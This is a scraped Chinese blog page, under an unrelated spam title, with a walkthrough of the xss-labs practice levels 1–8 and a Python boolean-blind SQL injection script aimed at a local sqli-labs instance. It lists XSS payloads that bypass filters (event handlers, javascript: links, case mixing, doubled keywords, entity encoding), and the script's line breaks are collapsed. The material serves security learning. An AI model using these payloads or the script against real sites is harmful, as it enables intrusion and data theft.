当前位置: 首页 > news >正文

运城网站建设哪个好关键词网站推广

运城网站建设哪个好,关键词网站推广,中国建设银行网站首页企业网银,wordpress建多个首页xss-labs 1到8关第一关我们发现&#xff0c;当我们更改name等于不同的值时&#xff0c;有不同的返回结果&#xff0c;因此在这里可能有xss漏洞然后直接进行测试&#xff0c;在name后面加入xss攻击语句​<script>alert(1)</script>第二关观察到input标签里面的value…

xss-labs 1到8关

第一关

我们发现,当我们更改name等于不同的值时,有不同的返回结果,因此在这里可能有xss漏洞

然后直接进行测试,在name后面加入xss攻击语句

​<script>alert(1)</script>

第二关

观察到input标签里面的value元素可以尝试突破,逃出引号后,可以使用事件来闭合后面的引号,这里距离onclick事件,当点击输入框后,执行这个弹窗

"><script>alert(1)</script

第三关

1' onclick='alert(1)

第四关

用"闭合后插入

1" onclick="alert(1)

第五关

查看源码发现把<script>转换成了<scr_ipt>,把on转成了o_n,这俩不能用了,换个标签

1'"> <a href="javascript:alert(1)">"'test</a>

第六关

直接使用大小写绕过

1'"> <a HRef="javaSCRipt:alert(1)">"'test</a>

第七关

1'"> <a hrhrefef="javascrscriptipt:alert(1)">"'test</a>

 双写了href和script

第八关

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

直接编码javascript:alert(1)为html实体编码

python实现自动化布尔自注的代码进行优化(二分查找)

import requests# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 推断数据库名的长度
def get_database_length():length = 0while True:length += 1payload = f"1' AND (SELECT length(database()) = {length}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return lengthif length > 50:  # 防止无限循环breakreturn 0# 使用二分查找推断数据库名
def get_database_name(length):db_name = ""for i in range(1, length + 1):left, right = 0, len(charset) - 1while left <= right:mid = (left + right) // 2char = charset[mid]payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:left = mid + 1else:right = mid - 1db_name += charset[right]return db_name# 主函数
if __name__ == "__main__":length = get_database_length()if length > 0:print(f"Database length: {length}")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")

http://www.dtcms.com/a/615464.html

相关文章:

  • 小白自己做网站网站建设的市场分析
  • 集合练习1
  • 苍南做网站哪里找深圳创业项目
  • 网站系统建设的主要意义离型剂技术支持东莞网站建设
  • 如何用rp做网站基于jsp的网上购物系统
  • 江门网站设计价格做贺卡网站
  • TOPS.FUN创新协议于2025年11月18日正式开启公测
  • 建设门户网站预算连云港网站建设价位
  • 免费个人自助建站苏州企业网站seo
  • 德保网站建设h5 和手机网站
  • Centos linux7 重置root密码
  • 前端微前端样式冲突,BEM命名规范
  • 镇江门户网站是哪个网站建设赚钱项目
  • 企业的网站建设文章洛阳做网站的
  • 有哪些可以建设网站的单位室内设计联盟官方网站下载
  • 9.7 Kochanek-Bartels样条曲线
  • 网站维护具体做啥互联网运营管理
  • 0基础做网站做淘客网站注意事项
  • 做钢化膜网站帝国cms论坛
  • 徐州建立网站品牌策划包括哪些内容
  • 嘉兴ai人工智能开发网站建设怀远网站建设
  • 河北建筑工程信息网站网络科技有限公司 网站建设
  • 深圳宝安网站建设免费中文网站模板
  • 陕西农产品网站建设服务器做网站好
  • 电商设计灵感网站产品展示网站源码
  • 学网站开发哪里好谷歌网页版入口在线
  • 河南省建设招投标网站百度如何添加店铺位置信息
  • 能源公司网站模板wordpress文件上传管理
  • 做app挣钱还是网站crm销售管理
  • 网络公司网站官网恩施市住房和城乡建设局网站